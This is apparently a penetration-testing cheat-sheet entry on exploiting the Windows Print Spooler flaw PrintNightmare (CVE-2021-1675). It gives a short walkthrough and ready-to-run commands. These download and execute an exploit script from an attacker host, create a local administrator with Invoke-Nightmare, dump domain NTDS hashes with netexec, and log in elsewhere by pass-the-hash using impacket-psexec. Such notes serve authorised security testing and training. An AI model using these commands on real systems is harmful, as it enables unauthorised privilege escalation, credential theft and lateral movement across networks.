PrintNightmare Local Privesc (CVE-2021-1675)
privescwindowstool
Summary
Exploit the Print Spooler (CVE-2021-1675) with Invoke-Nightmare to create a local admin; then optionally dump NTDS and psexec in with the recovered hash.
Walkthrough
PrintNightmare abuses the Windows Print Spooler service to run code as SYSTEM, here used to add a local administrator. It is unreliable and may only work intermittently.
Steps
- Download and dot-source the exploit, then run
Invoke-Nightmareto create a new local admin account; confirm withnet user. - With elevated access you can dump domain hashes (
--ntds) and authenticate elsewhere usingimpacket-psexecwith-hashes :<HASH>(pass-the-hash).
Commands
powershell
wget -usebasicparsing http://<IP>/CVE-2021-1675.ps1 -o CVE-2021-1675.ps1 . .\CVE-2021-1675.ps1 Invoke-Nightmare net user
bash
netexec smb <TARGET> -u 'admin' -p '<PASS>' --ntds impacket-psexec <TARGET>/administrator@<TARGET> -hashes :<HASH>